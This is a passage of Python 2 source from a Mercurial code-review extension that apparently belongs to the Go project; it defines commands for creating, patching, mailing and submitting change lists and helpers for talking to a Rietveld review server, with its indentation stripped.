return match_orig(ctx, pats=pats, opts=opts, globbed=globbed, default=default)
#######################################################################
# Commands added by code review extension.
#######################################################################
# hg change
def change(ui, repo, *pats, **opts):
"""create, edit or delete a change list
Create, edit or delete a change list.
A change list is a group of files to be reviewed and submitted together,
plus a textual description of the change.
Change lists are referred to by simple alphanumeric names.
Changes must be reviewed before they can be submitted.
In the absence of options, the change command opens the
change list for editing in the default editor.
Deleting a change with the -d or -D flag does not affect
the contents of the files listed in that change. To revert
the files listed in a change, use
hg revert @123456
before running hg change -d 123456.
"""
if codereview_disabled:
return codereview_disabled
dirty = {}
if len(pats) > 0 and GoodCLName(pats[0]):
name = pats[0]
if len(pats) != 1:
return "cannot specify CL name and file patterns"
pats = pats[1:]
cl, err = LoadCL(ui, repo, name, web=True)
if err != '':
return err
if not cl.local and (opts["stdin"] or not opts["stdout"]):
return "cannot change non-local CL " + name
else:
name = "new"
cl = CL("new")
if repo[None].branch() != "default":
return "cannot create CL outside default branch"
dirty[cl] = True
files = ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
if opts["delete"] or opts["deletelocal"]:
if opts["delete"] and opts["deletelocal"]:
return "cannot use -d and -D together"
flag = "-d"
if opts["deletelocal"]:
flag = "-D"
if name == "new":
return "cannot use "+flag+" with file patterns"
if opts["stdin"] or opts["stdout"]:
return "cannot use "+flag+" with -i or -o"
if not cl.local:
return "cannot change non-local CL " + name
if opts["delete"]:
if cl.copied_from:
return "original author must delete CL; hg change -D will remove locally"
PostMessage(ui, cl.name, "*** Abandoned ***", send_mail=cl.mailed)
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
return
if opts["stdin"]:
s = sys.stdin.read()
clx, line, err = ParseCL(s, name)
if err != '':
return "error parsing change list: line %d: %s" % (line, err)
if clx.desc is not None:
cl.desc = clx.desc;
dirty[cl] = True
if clx.reviewer is not None:
cl.reviewer = clx.reviewer
dirty[cl] = True
if clx.cc is not None:
cl.cc = clx.cc
dirty[cl] = True
if clx.files is not None:
cl.files = clx.files
dirty[cl] = True
if clx.private != cl.private:
cl.private = clx.private
dirty[cl] = True
if not opts["stdin"] and not opts["stdout"]:
if name == "new":
cl.files = files
err = EditCL(ui, repo, cl)
if err != "":
return err
dirty[cl] = True
for d, _ in dirty.items():
name = d.name
d.Flush(ui, repo)
if name == "new":
d.Upload(ui, repo, quiet=True)
if opts["stdout"]:
ui.write(cl.EditorText())
elif opts["pending"]:
ui.write(cl.PendingText())
elif name == "new":
if ui.quiet:
ui.write(cl.name)
else:
ui.write("CL created: " + cl.url + "\n")
return
#######################################################################
# hg code-login (broken?)
def code_login(ui, repo, **opts):
"""log in to code review server
Logs in to the code review server, saving a cookie in
a file in your home directory.
"""
if codereview_disabled:
return codereview_disabled
MySend(None)
#######################################################################
# hg clpatch / undo / release-apply / download
# All concerned with applying or unapplying patches to the repository.
def clpatch(ui, repo, clname, **opts):
"""import a patch from the code review server
Imports a patch from the code review server into the local client.
If the local client has already modified any of the files that the
patch modifies, this command will refuse to apply the patch.
Submitting an imported patch will keep the original author's
name as the Author: line but add your own name to a Committer: line.
"""
if repo[None].branch() != "default":
return "cannot run hg clpatch outside default branch"
return clpatch_or_undo(ui, repo, clname, opts, mode="clpatch")
def undo(ui, repo, clname, **opts):
"""undo the effect of a CL
Creates a new CL that undoes an earlier CL.
After creating the CL, opens the CL text for editing so that
you can add the reason for the undo to the description.
"""
if repo[None].branch() != "default":
return "cannot run hg undo outside default branch"
return clpatch_or_undo(ui, repo, clname, opts, mode="undo")
def release_apply(ui, repo, clname, **opts):
"""apply a CL to the release branch
Creates a new CL copying a previously committed change
from the main branch to the release branch.
The current client must either be clean or already be in
the release branch.
The release branch must be created by starting with a
clean client, disabling the code review plugin, and running:
hg update weekly.YYYY-MM-DD
hg branch release-branch.rNN
hg commit -m 'create release-branch.rNN'
hg push --new-branch
Then re-enable the code review plugin.
People can test the release branch by running
hg update release-branch.rNN
in a clean client. To return to the normal tree,
hg update default
Move changes since the weekly into the release branch
using hg release-apply followed by the usual code review
process and hg submit.
When it comes time to tag the release, record the
final long-form tag of the release-branch.rNN
in the *default* branch's .hgtags file. That is, run
hg update default
and then edit .hgtags as you would for a weekly.
"""
c = repo[None]
if not releaseBranch:
return "no active release branches"
if c.branch() != releaseBranch:
if c.modified() or c.added() or c.removed():
raise hg_util.Abort("uncommitted local changes - cannot switch branches")
err = hg_clean(repo, releaseBranch)
if err:
return err
try:
err = clpatch_or_undo(ui, repo, clname, opts, mode="backport")
if err:
raise hg_util.Abort(err)
except Exception, e:
hg_clean(repo, "default")
raise e
return None
def rev2clname(rev):
# Extract CL name from revision description.
# The last line in the description that is a codereview URL is the real one.
# Earlier lines might be part of the user-written description.
all = re.findall('(?m)^http://codereview.appspot.com/([0-9]+)$', rev.description())
if len(all) > 0:
return all[-1]
return ""
undoHeader = """undo CL %s / %s
<enter reason for undo>
««« original CL description
"""
undoFooter = """
»»»
"""
backportHeader = """[%s] %s
««« CL %s / %s
"""
backportFooter = """
»»»
"""
# Implementation of clpatch/undo.
def clpatch_or_undo(ui, repo, clname, opts, mode):
if codereview_disabled:
return codereview_disabled
if mode == "undo" or mode == "backport":
# Find revision in Mercurial repository.
# Assume CL number is 7+ decimal digits.
# Otherwise is either change log sequence number (fewer decimal digits),
# hexadecimal hash, or tag name.
# Mercurial will fall over long before the change log
# sequence numbers get to be 7 digits long.
if re.match('^[0-9]{7,}$', clname):
found = False
for r in hg_log(ui, repo, keyword="codereview.appspot.com/"+clname, limit=100, template="{node}\n").split():
rev = repo[r]
# Last line with a code review URL is the actual review URL.
# Earlier ones might be part of the CL description.
n = rev2clname(rev)
if n == clname:
found = True
break
if not found:
return "cannot find CL %s in local repository" % clname
else:
rev = repo[clname]
if not rev:
return "unknown revision %s" % clname
clname = rev2clname(rev)
if clname == "":
return "cannot find CL name in revision description"
# Create fresh CL and start with patch that would reverse the change.
vers = hg_node.short(rev.node())
cl = CL("new")
desc = str(rev.description())
if mode == "undo":
cl.desc = (undoHeader % (clname, vers)) + desc + undoFooter
else:
cl.desc = (backportHeader % (releaseBranch, line1(desc), clname, vers)) + desc + undoFooter
v1 = vers
v0 = hg_node.short(rev.parents()[0].node())
if mode == "undo":
arg = v1 + ":" + v0
else:
vers = v0
arg = v0 + ":" + v1
patch = RunShell(["hg", "diff", "--git", "-r", arg])
else: # clpatch
cl, vers, patch, err = DownloadCL(ui, repo, clname)
if err != "":
return err
if patch == emptydiff:
return "codereview issue %s has no diff" % clname
# find current hg version (hg identify)
ctx = repo[None]
parents = ctx.parents()
id = '+'.join([hg_node.short(p.node()) for p in parents])
# if version does not match the patch version,
# try to update the patch line numbers.
if vers != "" and id != vers:
# "vers in repo" gives the wrong answer
# on some versions of Mercurial. Instead, do the actual
# lookup and catch the exception.
try:
repo[vers].description()
except:
return "local repository is out of date; sync to get %s" % (vers)
patch1, err = portPatch(repo, patch, vers, id)
if err != "":
if not opts["ignore_hgpatch_failure"]:
return "codereview issue %s is out of date: %s (%s->%s)" % (clname, err, vers, id)
else:
patch = patch1
argv = ["hgpatch"]
if opts["no_incoming"] or mode == "backport":
argv += ["--checksync=false"]
try:
cmd = subprocess.Popen(argv, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None, close_fds=sys.platform != "win32")
except:
return "hgpatch: " + ExceptionDetail()
out, err = cmd.communicate(patch)
if cmd.returncode != 0 and not opts["ignore_hgpatch_failure"]:
return "hgpatch failed"
cl.local = True
cl.files = out.strip().split()
if not cl.files and not opts["ignore_hgpatch_failure"]:
return "codereview issue %s has no changed files" % clname
files = ChangedFiles(ui, repo, [])
extra = Sub(cl.files, files)
if extra:
ui.warn("warning: these files were listed in the patch but not changed:\n\t" + "\n\t".join(extra) + "\n")
cl.Flush(ui, repo)
if mode == "undo":
err = EditCL(ui, repo, cl)
if err != "":
return "CL created, but error editing: " + err
cl.Flush(ui, repo)
else:
ui.write(cl.PendingText() + "\n")
# portPatch rewrites patch from being a patch against
# oldver to being a patch against newver.
def portPatch(repo, patch, oldver, newver):
lines = patch.splitlines(True) # True = keep \n
delta = None
for i in range(len(lines)):
line = lines[i]
if line.startswith('--- a/'):
file = line[6:-1]
delta = fileDeltas(repo, file, oldver, newver)
if not delta or not line.startswith('@@ '):
continue
# @@ -x,y +z,w @@ means the patch chunk replaces
# the original file's line numbers x up to x+y with the
# line numbers z up to z+w in the new file.
# Find the delta from x in the original to the same
# line in the current version and add that delta to both
# x and z.
m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
if not m:
return None, "error parsing patch line numbers"
n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
d, err = lineDelta(delta, n1, len1)
if err != "":
return "", err
n1 += d
n2 += d
lines[i] = "@@ -%d,%d +%d,%d @@\n" % (n1, len1, n2, len2)
newpatch = ''.join(lines)
return newpatch, ""
# fileDelta returns the line number deltas for the given file's
# changes from oldver to newver.
# The deltas are a list of (n, len, newdelta) triples that say
# lines [n, n+len) were modified, and after that range the
# line numbers are +newdelta from what they were before.
def fileDeltas(repo, file, oldver, newver):
cmd = ["hg", "diff", "--git", "-r", oldver + ":" + newver, "path:" + file]
data = RunShell(cmd, silent_ok=True)
deltas = []
for line in data.splitlines():
m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
if not m:
continue
n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
deltas.append((n1, len1, n2+len2-(n1+len1)))
return deltas
# lineDelta finds the appropriate line number delta to apply to the lines [n, n+len).
# It returns an error if those lines were rewritten by the patch.
def lineDelta(deltas, n, len):
d = 0
for (old, oldlen, newdelta) in deltas:
if old >= n+len:
break
if old+len > n:
return 0, "patch and recent changes conflict"
d = newdelta
return d, ""
def download(ui, repo, clname, **opts):
"""download a change from the code review server
Download prints a description of the given change list
followed by its diff, downloaded from the code review server.
"""
if codereview_disabled:
return codereview_disabled
cl, vers, patch, err = DownloadCL(ui, repo, clname)
if err != "":
return err
ui.write(cl.EditorText() + "\n")
ui.write(patch + "\n")
return
#######################################################################
# hg file
def file(ui, repo, clname, pat, *pats, **opts):
"""assign files to or remove files from a change list
Assign files to or (with -d) remove files from a change list.
The -d option only removes files from the change list.
It does not edit them or remove them from the repository.
"""
if codereview_disabled:
return codereview_disabled
pats = tuple([pat] + list(pats))
if not GoodCLName(clname):
return "invalid CL name " + clname
dirty = {}
cl, err = LoadCL(ui, repo, clname, web=False)
if err != '':
return err
if not cl.local:
return "cannot change non-local CL " + clname
files = ChangedFiles(ui, repo, pats)
if opts["delete"]:
oldfiles = Intersect(files, cl.files)
if oldfiles:
if not ui.quiet:
ui.status("# Removing files from CL. To undo:\n")
ui.status("# cd %s\n" % (repo.root))
for f in oldfiles:
ui.status("# hg file %s %s\n" % (cl.name, f))
cl.files = Sub(cl.files, oldfiles)
cl.Flush(ui, repo)
else:
ui.status("no such files in CL")
return
if not files:
return "no such modified files"
files = Sub(files, cl.files)
taken = Taken(ui, repo)
warned = False
for f in files:
if f in taken:
if not warned and not ui.quiet:
ui.status("# Taking files from other CLs. To undo:\n")
ui.status("# cd %s\n" % (repo.root))
warned = True
ocl = taken[f]
if not ui.quiet:
ui.status("# hg file %s %s\n" % (ocl.name, f))
if ocl not in dirty:
ocl.files = Sub(ocl.files, files)
dirty[ocl] = True
cl.files = Add(cl.files, files)
dirty[cl] = True
for d, _ in dirty.items():
d.Flush(ui, repo)
return
#######################################################################
# hg gofmt
def gofmt(ui, repo, *pats, **opts):
"""apply gofmt to modified files
Applies gofmt to the modified files in the repository that match
the given patterns.
"""
if codereview_disabled:
return codereview_disabled
files = ChangedExistingFiles(ui, repo, pats, opts)
files = [f for f in files if f.endswith(".go")]
if not files:
return "no modified go files"
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
try:
cmd = ["gofmt", "-l"]
if not opts["list"]:
cmd += ["-w"]
if os.spawnvp(os.P_WAIT, "gofmt", cmd + files) != 0:
raise hg_util.Abort("gofmt did not exit cleanly")
except hg_error.Abort, e:
raise
except:
raise hg_util.Abort("gofmt: " + ExceptionDetail())
return
#######################################################################
# hg mail
def mail(ui, repo, *pats, **opts):
"""mail a change for review
Uploads a patch to the code review server and then sends mail
to the reviewer and CC list asking for a review.
"""
if codereview_disabled:
return codereview_disabled
cl, err = CommandLineCL(ui, repo, pats, opts, defaultcc=defaultcc)
if err != "":
return err
cl.Upload(ui, repo, gofmt_just_warn=True)
if not cl.reviewer:
# If no reviewer is listed, assign the review to defaultcc.
# This makes sure that it appears in the
# codereview.appspot.com/user/defaultcc
# page, so that it doesn't get dropped on the floor.
if not defaultcc:
return "no reviewers listed in CL"
cl.cc = Sub(cl.cc, defaultcc)
cl.reviewer = defaultcc
cl.Flush(ui, repo)
if cl.files == []:
return "no changed files, not sending mail"
cl.Mail(ui, repo)
#######################################################################
# hg p / hg pq / hg ps / hg pending
def ps(ui, repo, *pats, **opts):
"""alias for hg p --short
"""
opts['short'] = True
return pending(ui, repo, *pats, **opts)
def pq(ui, repo, *pats, **opts):
"""alias for hg p --quick
"""
opts['quick'] = True
return pending(ui, repo, *pats, **opts)
def pending(ui, repo, *pats, **opts):
"""show pending changes
Lists pending changes followed by a list of unassigned but modified files.
"""
if codereview_disabled:
return codereview_disabled
quick = opts.get('quick', False)
short = opts.get('short', False)
m = LoadAllCL(ui, repo, web=not quick and not short)
names = m.keys()
names.sort()
for name in names:
cl = m[name]
if short:
ui.write(name + "\t" + line1(cl.desc) + "\n")
else:
ui.write(cl.PendingText(quick=quick) + "\n")
if short:
return
files = DefaultFiles(ui, repo, [])
if len(files) > 0:
s = "Changed files not in any CL:\n"
for f in files:
s += "\t" + f + "\n"
ui.write(s)
#######################################################################
# hg submit
def need_sync():
raise hg_util.Abort("local repository out of date; must sync before submit")
def submit(ui, repo, *pats, **opts):
"""submit change to remote repository
Submits change to remote repository.
Bails out if the local repository is not in sync with the remote one.
"""
if codereview_disabled:
return codereview_disabled
# We already called this on startup but sometimes Mercurial forgets.
set_mercurial_encoding_to_utf8()
if not opts["no_incoming"] and hg_incoming(ui, repo):
need_sync()
cl, err = CommandLineCL(ui, repo, pats, opts, defaultcc=defaultcc)
if err != "":
return err
user = None
if cl.copied_from:
user = cl.copied_from
userline = CheckContributor(ui, repo, user)
typecheck(userline, str)
about = ""
if cl.reviewer:
about += "R=" + JoinComma([CutDomain(s) for s in cl.reviewer]) + "\n"
if opts.get('tbr'):
tbr = SplitCommaSpace(opts.get('tbr'))
cl.reviewer = Add(cl.reviewer, tbr)
about += "TBR=" + JoinComma([CutDomain(s) for s in tbr]) + "\n"
if cl.cc:
about += "CC=" + JoinComma([CutDomain(s) for s in cl.cc]) + "\n"
if not cl.reviewer:
return "no reviewers listed in CL"
if not cl.local:
return "cannot submit non-local CL"
# upload, to sync current patch and also get change number if CL is new.
if not cl.copied_from:
cl.Upload(ui, repo, gofmt_just_warn=True)
# check gofmt for real; allowed upload to warn in order to save CL.
cl.Flush(ui, repo)
CheckFormat(ui, repo, cl.files)
about += "%s%s\n" % (server_url_base, cl.name)
if cl.copied_from:
about += "\nCommitter: " + CheckContributor(ui, repo, None) + "\n"
typecheck(about, str)
if not cl.mailed and not cl.copied_from: # in case this is TBR
cl.Mail(ui, repo)
# submit changes locally
message = cl.desc.rstrip() + "\n\n" + about
typecheck(message, str)
set_status("pushing " + cl.name + " to remote server")
if hg_outgoing(ui, repo):
raise hg_util.Abort("local repository corrupt or out-of-phase with remote: found outgoing changes")
old_heads = len(hg_heads(ui, repo).split())
global commit_okay
commit_okay = True
ret = hg_commit(ui, repo, *['path:'+f for f in cl.files], message=message, user=userline)
commit_okay = False
if ret:
return "nothing changed"
node = repo["-1"].node()
# push to remote; if it fails for any reason, roll back
try:
new_heads = len(hg_heads(ui, repo).split())
if old_heads != new_heads:
# Created new head, so we weren't up to date.
need_sync()
# Push changes to remote. If it works, we're committed. If not, roll back.
try:
hg_push(ui, repo)
except hg_error.Abort, e:
if e.message.find("push creates new heads") >= 0:
# Remote repository had changes we missed.
need_sync()
raise
except:
real_rollback()
raise
# We're committed. Upload final patch, close review, add commit message.
changeURL = hg_node.short(node)
url = ui.expandpath("default")
m = re.match("^https?://([^@/]+@)?([^.]+)\.googlecode\.com/hg/?", url)
if m:
changeURL = "http://code.google.com/p/%s/source/detail?r=%s" % (m.group(2), changeURL)
else:
print >>sys.stderr, "URL: ", url
pmsg = "*** Submitted as " + changeURL + " ***\n\n" + message
# When posting, move reviewers to CC line,
# so that the issue stops showing up in their "My Issues" page.
PostMessage(ui, cl.name, pmsg, reviewers="", cc=JoinComma(cl.reviewer+cl.cc))
if not cl.copied_from:
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
c = repo[None]
if c.branch() == releaseBranch and not c.modified() and not c.added() and not c.removed():
ui.write("switching from %s to default branch.\n" % releaseBranch)
err = hg_clean(repo, "default")
if err:
return err
return None
#######################################################################
# hg sync
def sync(ui, repo, **opts):
"""synchronize with remote repository
Incorporates recent changes from the remote repository
into the local repository.
"""
if codereview_disabled:
return codereview_disabled
if not opts["local"]:
err = hg_pull(ui, repo, update=True)
if err:
return err
sync_changes(ui, repo)
def sync_changes(ui, repo):
# Look through recent change log descriptions to find
# potential references to http://.*/our-CL-number.
# Double-check them by looking at the Rietveld log.
for rev in hg_log(ui, repo, limit=100, template="{node}\n").split():
desc = repo[rev].description().strip()
for clname in re.findall('(?m)^http://(?:[^\n]+)/([0-9]+)$', desc):
if IsLocalCL(ui, repo, clname) and IsRietveldSubmitted(ui, clname, repo[rev].hex()):
ui.warn("CL %s submitted as %s; closing\n" % (clname, repo[rev]))
cl, err = LoadCL(ui, repo, clname, web=False)
if err != "":
ui.warn("loading CL %s: %s\n" % (clname, err))
continue
if not cl.copied_from:
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
# Remove files that are not modified from the CLs in which they appear.
all = LoadAllCL(ui, repo, web=False)
changed = ChangedFiles(ui, repo, [])
for cl in all.values():
extra = Sub(cl.files, changed)
if extra:
ui.warn("Removing unmodified files from CL %s:\n" % (cl.name,))
for f in extra:
ui.warn("\t%s\n" % (f,))
cl.files = Sub(cl.files, extra)
cl.Flush(ui, repo)
if not cl.files:
if not cl.copied_from:
ui.warn("CL %s has no files; delete (abandon) with hg change -d %s\n" % (cl.name, cl.name))
else:
ui.warn("CL %s has no files; delete locally with hg change -D %s\n" % (cl.name, cl.name))
return
#######################################################################
# hg upload
def upload(ui, repo, name, **opts):
"""upload diffs to the code review server
Uploads the current modifications for a given change to the server.
"""
if codereview_disabled:
return codereview_disabled
repo.ui.quiet = True
cl, err = LoadCL(ui, repo, name, web=True)
if err != "":
return err
if not cl.local:
return "cannot upload non-local change"
cl.Upload(ui, repo)
print "%s%s\n" % (server_url_base, cl.name)
return
#######################################################################
# Table of commands, supplied to Mercurial for installation.
review_opts = [
('r', 'reviewer', '', 'add reviewer'),
('', 'cc', '', 'add cc'),
('', 'tbr', '', 'add future reviewer'),
('m', 'message', '', 'change description (for new change)'),
]
cmdtable = {
# The ^ means to show this command in the help text that
# is printed when running hg with no arguments.
"^change": (
change,
[
('d', 'delete', None, 'delete existing change list'),
('D', 'deletelocal', None, 'delete locally, but do not change CL on server'),
('i', 'stdin', None, 'read change list from standard input'),
('o', 'stdout', None, 'print change list to standard output'),
('p', 'pending', None, 'print pending summary to standard output'),
],
"[-d | -D] [-i] [-o] change# or FILE ..."
),
"^clpatch": (
clpatch,
[
('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
# Would prefer to call this codereview-login, but then
# hg help codereview prints the help for this command
# instead of the help for the extension.
"code-login": (
code_login,
[],
"",
),
"^download": (
download,
[],
"change#"
),
"^file": (
file,
[
('d', 'delete', None, 'delete files from change list (but not repository)'),
],
"[-d] change# FILE ..."
),
"^gofmt": (
gofmt,
[
('l', 'list', None, 'list files that would change, but do not edit them'),
],
"FILE ..."
),
"^pending|p": (
pending,
[
('s', 'short', False, 'show short result form'),
('', 'quick', False, 'do not consult codereview server'),
],
"[FILE ...]"
),
"^ps": (
ps,
[],
"[FILE ...]"
),
"^pq": (
pq,
[],
"[FILE ...]"
),
"^mail": (
mail,
review_opts + [
] + hg_commands.walkopts,
"[-r reviewer] [--cc cc] [change# | file ...]"
),
"^release-apply": (
release_apply,
[
('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
# TODO: release-start, release-tag, weekly-tag
"^submit": (
submit,
review_opts + [
('', 'no_incoming', None, 'disable initial incoming check (for testing)'),
] + hg_commands.walkopts + hg_commands.commitopts + hg_commands.commitopts2,
"[-r reviewer] [--cc cc] [change# | file ...]"
),
"^sync": (
sync,
[
('', 'local', None, 'do not pull changes from remote repository')
],
"[--local]",
),
"^undo": (
undo,
[
('', 'ignore_hgpatch_failure', None, 'create CL metadata even if hgpatch fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
"^upload": (
upload,
[],
"change#"
),
}
#######################################################################
# Mercurial extension initialization
def norollback(*pats, **opts):
"""(disabled when using this extension)"""
raise hg_util.Abort("codereview extension enabled; use undo instead of rollback")
def reposetup(ui, repo):
global codereview_disabled
global defaultcc
repo_config_path = ''
# Read repository-specific options from lib/codereview/codereview.cfg
try:
repo_config_path = repo.root + '/lib/codereview/codereview.cfg'
f = open(repo_config_path)
for line in f:
if line.startswith('defaultcc: '):
defaultcc = SplitCommaSpace(line[10:])
except:
# If there are no options, chances are good this is not
# a code review repository; stop now before we foul
# things up even worse. Might also be that repo doesn't
# even have a root. See issue 959.
if repo_config_path == '':
codereview_disabled = 'codereview disabled: repository has no root'
else:
codereview_disabled = 'codereview disabled: cannot open ' + repo_config_path
return
InstallMatch(ui, repo)
ReadContributors(ui, repo)
RietveldSetup(ui, repo)
# Disable the Mercurial commands that might change the repository.
# Only commands in this extension are supposed to do that.
ui.setconfig("hooks", "precommit.codereview", precommithook)
# Rollback removes an existing commit. Don't do that either.
global real_rollback
real_rollback = repo.rollback
repo.rollback = norollback
#######################################################################
# Wrappers around upload.py for interacting with Rietveld
from HTMLParser import HTMLParser
# HTML form parser
class FormParser(HTMLParser):
def __init__(self):
self.map = {}
self.curtag = None
self.curdata = None
HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
if tag == "input":
key = None
value = ''
for a in attrs:
if a[0] == 'name':
key = a[1]
if a[0] == 'value':
value = a[1]
if key is not None:
self.map[key] = value
if tag == "textarea":
key = None
for a in attrs:
if a[0] == 'name':
key = a[1]
if key is not None:
self.curtag = key
self.curdata = ''
def handle_endtag(self, tag):
if tag == "textarea" and self.curtag is not None:
self.map[self.curtag] = self.curdata
self.curtag = None
self.curdata = None
def handle_charref(self, name):
self.handle_data(unichr(int(name)))
def handle_entityref(self, name):
import htmlentitydefs
if name in htmlentitydefs.entitydefs:
self.handle_data(htmlentitydefs.entitydefs[name])
else:
self.handle_data("&" + name + ";")
def handle_data(self, data):
if self.curdata is not None:
self.curdata += data
def JSONGet(ui, path):
try:
data = MySend(path, force_auth=False)
typecheck(data, str)
d = fix_json(json.loads(data))
except:
ui.warn("JSONGet %s: %s\n" % (path, ExceptionDetail()))
return None
return d
# Clean up json parser output to match our expectations:
# * all strings are UTF-8-encoded str, not unicode.
# * missing fields are missing, not None,
# so that d.get("foo", defaultvalue) works.
def fix_json(x):
if type(x) in [str, int, float, bool, type(None)]:
pass
elif type(x) is unicode:
x = x.encode("utf-8")
elif type(x) is list:
for i in range(len(x)):
x[i] = fix_json(x[i])
elif type(x) is dict:
todel = []
for k in x:
if x[k] is None:
todel.append(k)
else:
x[k] = fix_json(x[k])
for k in todel:
del x[k]
else:
raise hg_util.Abort("unknown type " + str(type(x)) + " in fix_json")
if type(x) is str:
x = x.replace('\r\n', '\n')
return x
def IsRietveldSubmitted(ui, clname, hex):
dict = JSONGet(ui, "/api/" + clname + "?messages=true")
if dict is None:
return False
for msg in dict.get("messages", []):
text = msg.get("text", "")
m = re.match('\*\*\* Submitted as [^*]*?([0-9a-f]+) \*\*\*', text)
if m is not None and len(m.group(1)) >= 8 and hex.startswith(m.group(1)):
return True
return False
def IsRietveldMailed(cl):
for msg in cl.dict.get("messages", []):
if msg.get("text", "").find("I'd like you to review this change") >= 0:
return True
return False
def DownloadCL(ui, repo, clname):
set_status("downloading CL " + clname)
cl, err = LoadCL(ui, repo, clname, web=True)
if err != "":
return None, None, None, "error loading CL %s: %s" % (clname, err)
# Find most recent diff
diffs = cl.dict.get("patchsets", [])
if not diffs:
return None, None, None, "CL has no patch sets"
patchid = diffs[-1]
patchset = JSONGet(ui, "/api/" + clname + "/" + str(patchid))
if patchset is None:
return None, None, None, "error loading CL patchset %s/%d" % (clname, patchid)
if patchset.get("patchset", 0) != patchid:
return None, None, None, "malformed patchset information"
vers = ""
msg = patchset.get("message", "").split()
if len(msg) >= 3 and msg[0] == "diff" and msg[1] == "-r":
vers = msg[2]
diff = "/download/issue" + clname + "_" + str(patchid) + ".diff"
diffdata = MySend(diff, force_auth=False)
# Print warning if email is not in CONTRIBUTORS file.
email = cl.dict.get("owner_email", "")
if not email:
return None, None, None, "cannot find owner for %s" % (clname)
him = FindContributor(ui, repo, email)
me = FindContributor(ui, repo, None)
if him == me:
cl.mailed = IsRietveldMailed(cl)
else:
cl.copied_from = email
return cl, vers, diffdata, ""
def MySend(request_path, payload=None,
content_type="application/octet-stream",
timeout=None, force_auth=True,
**kwargs):
"""Run MySend1 maybe twice, because Rietveld is unreliable."""
try:
return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
except Exception, e:
if type(e) != urllib2.HTTPError or e.code != 500: # only retry on HTTP 500 error
raise
print >>sys.stderr, "Loading "+request_path+": "+ExceptionDetail()+"; trying again in 2 seconds."
time.sleep(2)
return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
def MySend1(request_path, payload=None,
content_type="application/octet-stream",
timeout=None, force_auth=True,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
global rpc
if rpc == None:
rpc = GetRpcServer(upload_options)
self = rpc
if not self.authenticated and force_auth:
self._Authenticate()
if request_path is None:
return
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "http://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
# Translate \r\n into \n, because Rietveld doesn't.
response = response.replace('\r\n', '\n')
# who knows what urllib will give us
if type(response) == unicode:
response = response.encode("utf-8")
typecheck(response, str)
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401:
self._Authenticate()
elif e.code == 302:
loc = e.info()["location"]
if not loc.startswith('https://www.google.com/a') or loc.find('/ServiceLogin') < 0:
return ''
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
def GetForm(url):
f = FormParser()
f.feed(ustr(MySend(url))) # f.feed wants unicode
f.close()
# convert back to utf-8 to restore sanity
m = {}
for k,v in f.map.items():
m[k.encode("utf-8")] = v.replace("\r\n", "\n").encode("utf-8")
return m
def EditDesc(issue, subject=None, desc=None, reviewers=None, cc=None, closed=False, private=False):
set_status("uploading change to description")
form_fields = GetForm("/" + issue + "/edit")
if subject is not None:
form_fields['subject'] = subject
if desc is not None:
form_fields['description'] = desc
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if closed:
form_fields['closed'] = "checked"
if private:
form_fields['private'] = "checked"
ctype, body = EncodeMultipartFormData(form_fields.items(), [])
response = MySend("/" + issue + "/edit", body, content_type=ctype)
if response != "":
print >>sys.stderr, "Error editing description:\n" + "Sent form: \n", form_fields, "\n", response
sys.exit(2)
def PostMessage(ui, issue, message, reviewers=None, cc=None, send_mail=True, subject=None):
set_status("uploading message")
form_fields = GetForm("/" + issue + "/publish")
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if send_mail:
form_fields['send_mail'] = "checked"
else:
del form_fields['send_mail']
if subject is not None:
form_fields['subject'] = subject
form_fields['message'] = message
form_fields['message_only'] = '1' # Don't include draft comments
if reviewers is not None or cc is not None:
form_fields['message_only'] = '' # Must set '' in order to override cc/reviewer
ctype = "applications/x-www-form-urlencoded"
body = urllib.urlencode(form_fields)
response = MySend("/" + issue + "/publish", body, content_type=ctype)
if response != "":
print response
sys.exit(2)
class opt(object):
pass
def RietveldSetup(ui, repo):
global force_google_account
global rpc
global server
global server_url_base
global upload_options
global verbosity
if not ui.verbose:
verbosity = 0
# Config options.
x = ui.config("codereview", "server")
if x is not None:
server = x
# TODO(rsc): Take from ui.username?
email = None
x = ui.config("codereview", "email")
if x is not None:
email = x
server_url_base = "http://" + server + "/"
testing = ui.config("codereview", "testing")
force_google_account = ui.configbool("codereview", "force_google_account", False)
upload_options = opt()
